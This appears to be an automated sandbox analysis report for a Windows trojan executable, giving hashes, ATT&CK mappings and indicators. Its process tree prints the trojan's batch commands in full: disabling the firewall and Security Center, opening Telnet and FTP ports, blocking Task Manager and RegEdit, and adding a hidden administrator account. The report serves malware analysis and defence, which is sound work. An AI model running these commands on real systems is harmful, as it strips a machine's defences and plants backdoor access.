4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46d

Analysis

max time kernel
93s
max time network
95s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-01-2025 09:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46dN.exe
Size

20KB
MD5

753d99248cd46572938a6700ba2d6550
SHA1

453edba4c9d47ddeb28b83f05231fa9554e61c60
SHA256

4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46d
SHA512

9cc5419ded48d41812b044aa6b2afc215b5eb4d42f2372fc06f671c183a04399e137bfae924fb3b0c01f10205b593ecfe26b34063581fb1b52268682d32083c3
SSDEEP

384:xScEHK2HaSvfKzxWQ7U+UqzykEX/RAjnP/nvdOsy1kwOw:Qc4PH3yzJ7U+UqS+DVOIwO

Score

10^/10

discovery evasion execution persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Modifies Windows Firewall 2 TTPs 8 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4904	netsh.exe
3016	netsh.exe
364	netsh.exe
1844	netsh.exe
4312	netsh.exe
116	netsh.exe
2892	netsh.exe
2316	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46dN.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4692-0-0x0000000000400000-0x0000000000410000-memory.dmp	upx
behavioral2/memory/4692-5-0x0000000000400000-0x0000000000410000-memory.dmp	upx

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
228	sc.exe
4048	sc.exe
1976	sc.exe
4248	sc.exe
1532	sc.exe
3812	sc.exe
2400	sc.exe
4128	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46dN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
4716	reg.exe
4356	reg.exe

Runs net.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4692 wrote to memory of 1428	4692	4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46dN.exe	83
PID 4692 wrote to memory of 1428	4692	4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46dN.exe	83
PID 4692 wrote to memory of 1428	4692	4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46dN.exe	83
PID 1428 wrote to memory of 4312	1428	cmd.exe	86
PID 1428 wrote to memory of 4312	1428	cmd.exe	86
PID 1428 wrote to memory of 4312	1428	cmd.exe	86
PID 1428 wrote to memory of 116	1428	cmd.exe	87
PID 1428 wrote to memory of 116	1428	cmd.exe	87
PID 1428 wrote to memory of 116	1428	cmd.exe	87
PID 1428 wrote to memory of 2892	1428	cmd.exe	88
PID 1428 wrote to memory of 2892	1428	cmd.exe	88
PID 1428 wrote to memory of 2892	1428	cmd.exe	88
PID 1428 wrote to memory of 2316	1428	cmd.exe	89
PID 1428 wrote to memory of 2316	1428	cmd.exe	89
PID 1428 wrote to memory of 2316	1428	cmd.exe	89
PID 1428 wrote to memory of 4904	1428	cmd.exe	90
PID 1428 wrote to memory of 4904	1428	cmd.exe	90
PID 1428 wrote to memory of 4904	1428	cmd.exe	90
PID 1428 wrote to memory of 3016	1428	cmd.exe	91
PID 1428 wrote to memory of 3016	1428	cmd.exe	91
PID 1428 wrote to memory of 3016	1428	cmd.exe	91
PID 1428 wrote to memory of 364	1428	cmd.exe	92
PID 1428 wrote to memory of 364	1428	cmd.exe	92
PID 1428 wrote to memory of 364	1428	cmd.exe	92
PID 1428 wrote to memory of 4048	1428	cmd.exe	93
PID 1428 wrote to memory of 4048	1428	cmd.exe	93
PID 1428 wrote to memory of 4048	1428	cmd.exe	93
PID 1428 wrote to memory of 1976	1428	cmd.exe	94
PID 1428 wrote to memory of 1976	1428	cmd.exe	94
PID 1428 wrote to memory of 1976	1428	cmd.exe	94
PID 1428 wrote to memory of 1844	1428	cmd.exe	95
PID 1428 wrote to memory of 1844	1428	cmd.exe	95
PID 1428 wrote to memory of 1844	1428	cmd.exe	95
PID 1428 wrote to memory of 4248	1428	cmd.exe	96
PID 1428 wrote to memory of 4248	1428	cmd.exe	96
PID 1428 wrote to memory of 4248	1428	cmd.exe	96
PID 1428 wrote to memory of 1532	1428	cmd.exe	97
PID 1428 wrote to memory of 1532	1428	cmd.exe	97
PID 1428 wrote to memory of 1532	1428	cmd.exe	97
PID 1428 wrote to memory of 3812	1428	cmd.exe	98
PID 1428 wrote to memory of 3812	1428	cmd.exe	98
PID 1428 wrote to memory of 3812	1428	cmd.exe	98
PID 1428 wrote to memory of 2400	1428	cmd.exe	99
PID 1428 wrote to memory of 2400	1428	cmd.exe	99
PID 1428 wrote to memory of 2400	1428	cmd.exe	99
PID 1428 wrote to memory of 4716	1428	cmd.exe	100
PID 1428 wrote to memory of 4716	1428	cmd.exe	100
PID 1428 wrote to memory of 4716	1428	cmd.exe	100
PID 1428 wrote to memory of 4356	1428	cmd.exe	101
PID 1428 wrote to memory of 4356	1428	cmd.exe	101
PID 1428 wrote to memory of 4356	1428	cmd.exe	101
PID 1428 wrote to memory of 4128	1428	cmd.exe	102
PID 1428 wrote to memory of 4128	1428	cmd.exe	102
PID 1428 wrote to memory of 4128	1428	cmd.exe	102
PID 1428 wrote to memory of 228	1428	cmd.exe	103
PID 1428 wrote to memory of 228	1428	cmd.exe	103
PID 1428 wrote to memory of 228	1428	cmd.exe	103
PID 1428 wrote to memory of 3252	1428	cmd.exe	104
PID 1428 wrote to memory of 3252	1428	cmd.exe	104
PID 1428 wrote to memory of 3252	1428	cmd.exe	104
PID 3252 wrote to memory of 4644	3252	net.exe	105
PID 3252 wrote to memory of 4644	3252	net.exe	105
PID 3252 wrote to memory of 4644	3252	net.exe	105
PID 1428 wrote to memory of 3620	1428	cmd.exe	106

C:\Users\Admin\AppData\Local\Temp\4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46dN.exe
"C:\Users\Admin\AppData\Local\Temp\4c4b5c0168820b83df1bf14fb385fc0e48bf896c9868b8d8357dbac613b4b46dN.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AB24.tmp\trj.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1428
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram C:\Windows\system32\telnet.exe telnet ENABLE
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:4312
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram C:\Windows\system32\tftp.exe tftp ENABLE
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:116
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram C:\Windows\system32\ftp.exe ftp ENABLE
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2892
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram C:\Windows\system32\net.exe net ENABLE
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2316
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add portopening ALL 23 tel
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:4904
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add portopening ALL 21 ftp
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:3016
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add portopening ALL 713 fyg
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:364
- - C:\Windows\SysWOW64\sc.exe
    sc config wscsvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4048
- - C:\Windows\SysWOW64\sc.exe
    sc stop wscsvc
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1976
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:1844
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4248
- - C:\Windows\SysWOW64\sc.exe
    sc stop SharedAccess
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1532
- - C:\Windows\SysWOW64\sc.exe
    sc config Messenger start= auto
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3812
- - C:\Windows\SysWOW64\sc.exe
    sc start Messenger
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2400
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4716
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
    3⤵
    - Disables RegEdit via registry modification
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4356
- - C:\Windows\SysWOW64\sc.exe
    sc config TlntSvr start= auto
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4128
- - C:\Windows\SysWOW64\sc.exe
    sc start TlntSvr
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:228
- - C:\Windows\SysWOW64\net.exe
    net user fygga passwords /add
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3252
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user fygga passwords /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:4644
- - C:\Windows\SysWOW64\net.exe
    net localgroup administrators fygga /add
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3620
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup administrators fygga /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:3656
- - C:\Windows\SysWOW64\reg.exe
    REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v fygga /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AB24.tmp\trj.bat

Filesize
1KB

MD5
b03f305099217bdb5ce57711da17d81a

SHA1
7561ebbf9f1f4e64534c229f54cbb76724b31ebe

SHA256
f189169de486517acdd601ba111b50c315abe374b03ba2cfce01d7d505e78b2e

SHA512
b90ca42653f9b0189a7d5bea3c698f5ee9ebd3952215453676507aae85c5d3a04c439325ff318f03a066e8447d0bb3b616312da6415efe58b68a0b401e881efc

Download Submit
memory/4692-0-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/4692-5-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads